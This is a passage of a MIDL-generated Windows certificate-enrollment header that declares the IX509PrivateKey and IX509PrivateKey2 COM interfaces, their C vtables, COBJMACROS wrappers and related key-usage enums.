            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Pin( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_FriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Description( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Description( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PrivateKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PrivateKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PrivateKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PrivateKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Open )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Create )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Close )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Delete )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Verify )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyVerify VerifyType);
        
        HRESULT ( STDMETHODCALLTYPE *Import )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey);
        
        HRESULT ( STDMETHODCALLTYPE *ExportPublicKey )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReaderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ReaderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatus )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspStatus )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt ICspStatus *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderType )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderType )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509ProviderType Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_LegacyCsp )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Algorithm )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeySpec )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509KeySpec Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Length )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ExportPolicy )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ExportPolicy )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyExportFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyUsage )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyUsageFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyProtection )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyProtection )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyProtection Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineContext )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_MachineContext )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509PrivateKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Certificate )( 
            __RPC__in IX509PrivateKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UniqueContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Opened )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultContainer )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Existing )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Existing )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Description )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        END_INTERFACE
    } IX509PrivateKeyVtbl;

    interface IX509PrivateKey
    {
        CONST_VTBL struct IX509PrivateKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PrivateKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PrivateKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PrivateKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PrivateKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PrivateKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PrivateKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PrivateKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PrivateKey_Open(This)	\
    ( (This)->lpVtbl -> Open(This) ) 

#define IX509PrivateKey_Create(This)	\
    ( (This)->lpVtbl -> Create(This) ) 

#define IX509PrivateKey_Close(This)	\
    ( (This)->lpVtbl -> Close(This) ) 

#define IX509PrivateKey_Delete(This)	\
    ( (This)->lpVtbl -> Delete(This) ) 

#define IX509PrivateKey_Verify(This,VerifyType)	\
    ( (This)->lpVtbl -> Verify(This,VerifyType) ) 

#define IX509PrivateKey_Import(This,strExportType,strEncodedKey,Encoding)	\
    ( (This)->lpVtbl -> Import(This,strExportType,strEncodedKey,Encoding) ) 

#define IX509PrivateKey_Export(This,strExportType,Encoding,pstrEncodedKey)	\
    ( (This)->lpVtbl -> Export(This,strExportType,Encoding,pstrEncodedKey) ) 

#define IX509PrivateKey_ExportPublicKey(This,ppPublicKey)	\
    ( (This)->lpVtbl -> ExportPublicKey(This,ppPublicKey) ) 

#define IX509PrivateKey_get_ContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerName(This,pValue) ) 

#define IX509PrivateKey_put_ContainerName(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerName(This,Value) ) 

#define IX509PrivateKey_get_ContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerNamePrefix(This,pValue) ) 

#define IX509PrivateKey_put_ContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerNamePrefix(This,Value) ) 

#define IX509PrivateKey_get_ReaderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ReaderName(This,pValue) ) 

#define IX509PrivateKey_put_ReaderName(This,Value)	\
    ( (This)->lpVtbl -> put_ReaderName(This,Value) ) 

#define IX509PrivateKey_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509PrivateKey_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509PrivateKey_get_CspStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatus(This,ppValue) ) 

#define IX509PrivateKey_put_CspStatus(This,pValue)	\
    ( (This)->lpVtbl -> put_CspStatus(This,pValue) ) 

#define IX509PrivateKey_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509PrivateKey_put_ProviderName(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderName(This,Value) ) 

#define IX509PrivateKey_get_ProviderType(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderType(This,pValue) ) 

#define IX509PrivateKey_put_ProviderType(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderType(This,Value) ) 

#define IX509PrivateKey_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define IX509PrivateKey_put_LegacyCsp(This,Value)	\
    ( (This)->lpVtbl -> put_LegacyCsp(This,Value) ) 

#define IX509PrivateKey_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PrivateKey_put_Algorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_Algorithm(This,pValue) ) 

#define IX509PrivateKey_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509PrivateKey_put_KeySpec(This,Value)	\
    ( (This)->lpVtbl -> put_KeySpec(This,Value) ) 

#define IX509PrivateKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PrivateKey_put_Length(This,Value)	\
    ( (This)->lpVtbl -> put_Length(This,Value) ) 

#define IX509PrivateKey_get_ExportPolicy(This,pValue)	\
    ( (This)->lpVtbl -> get_ExportPolicy(This,pValue) ) 

#define IX509PrivateKey_put_ExportPolicy(This,Value)	\
    ( (This)->lpVtbl -> put_ExportPolicy(This,Value) ) 

#define IX509PrivateKey_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#define IX509PrivateKey_put_KeyUsage(This,Value)	\
    ( (This)->lpVtbl -> put_KeyUsage(This,Value) ) 

#define IX509PrivateKey_get_KeyProtection(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyProtection(This,pValue) ) 

#define IX509PrivateKey_put_KeyProtection(This,Value)	\
    ( (This)->lpVtbl -> put_KeyProtection(This,Value) ) 

#define IX509PrivateKey_get_MachineContext(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineContext(This,pValue) ) 

#define IX509PrivateKey_put_MachineContext(This,Value)	\
    ( (This)->lpVtbl -> put_MachineContext(This,Value) ) 

#define IX509PrivateKey_get_SecurityDescriptor(This,pValue)	\
    ( (This)->lpVtbl -> get_SecurityDescriptor(This,pValue) ) 

#define IX509PrivateKey_put_SecurityDescriptor(This,Value)	\
    ( (This)->lpVtbl -> put_SecurityDescriptor(This,Value) ) 

#define IX509PrivateKey_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509PrivateKey_put_Certificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Certificate(This,Encoding,Value) ) 

#define IX509PrivateKey_get_UniqueContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_UniqueContainerName(This,pValue) ) 

#define IX509PrivateKey_get_Opened(This,pValue)	\
    ( (This)->lpVtbl -> get_Opened(This,pValue) ) 

#define IX509PrivateKey_get_DefaultContainer(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultContainer(This,pValue) ) 

#define IX509PrivateKey_get_Existing(This,pValue)	\
    ( (This)->lpVtbl -> get_Existing(This,pValue) ) 

#define IX509PrivateKey_put_Existing(This,Value)	\
    ( (This)->lpVtbl -> put_Existing(This,Value) ) 

#define IX509PrivateKey_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509PrivateKey_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509PrivateKey_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509PrivateKey_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509PrivateKey_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509PrivateKey_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509PrivateKey_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define IX509PrivateKey_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IX509PrivateKey_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IX509PrivateKey_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#define IX509PrivateKey_put_Description(This,Value)	\
    ( (This)->lpVtbl -> put_Description(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PrivateKey_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0014 */
/* [local] */ 

typedef 
enum X509HardwareKeyUsageFlags
    {
        XCN_NCRYPT_PCP_NONE	= 0,
        XCN_NCRYPT_TPM12_PROVIDER	= 0x10000,
        XCN_NCRYPT_PCP_SIGNATURE_KEY	= 0x1,
        XCN_NCRYPT_PCP_ENCRYPTION_KEY	= 0x2,
        XCN_NCRYPT_PCP_GENERIC_KEY	= ( 0x1 | 0x2 ) ,
        XCN_NCRYPT_PCP_STORAGE_KEY	= 0x4,
        XCN_NCRYPT_PCP_IDENTITY_KEY	= 0x8
    } 	X509HardwareKeyUsageFlags;

typedef 
enum X509KeyParametersExportType
    {
        XCN_CRYPT_OID_USE_CURVE_NONE	= 0,
        XCN_CRYPT_OID_USE_CURVE_NAME_FOR_ENCODE_FLAG	= 0x20000000,
        XCN_CRYPT_OID_USE_CURVE_PARAMETERS_FOR_ENCODE_FLAG	= 0x10000000
    } 	X509KeyParametersExportType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0014_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0014_v0_0_s_ifspec;

#ifndef __IX509PrivateKey2_INTERFACE_DEFINED__
#define __IX509PrivateKey2_INTERFACE_DEFINED__

/* interface IX509PrivateKey2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PrivateKey2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab362-217d-11da-b2a4-000e7bbb2b09")
    IX509PrivateKey2 : public IX509PrivateKey
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HardwareKeyUsage( 
            /* [retval][out] */ __RPC__out X509HardwareKeyUsageFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_HardwareKeyUsage( 
            /* [in] */ X509HardwareKeyUsageFlags Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateStorageLocation( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateStorageLocation( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AlgorithmName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AlgorithmName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlgorithmParameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlgorithmParameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParametersExportType( 
            /* [retval][out] */ __RPC__out X509KeyParametersExportType *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParametersExportType( 
            /* [in] */ X509KeyParametersExportType Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PrivateKey2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PrivateKey2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PrivateKey2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Open )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Create )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Close )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Delete )( 
            __RPC__in IX509PrivateKey2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *Verify )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyVerify VerifyType);
        
        HRESULT ( STDMETHODCALLTYPE *Import )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey);
        
        HRESULT ( STDMETHODCALLTYPE *ExportPublicKey )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerNamePrefix )( 
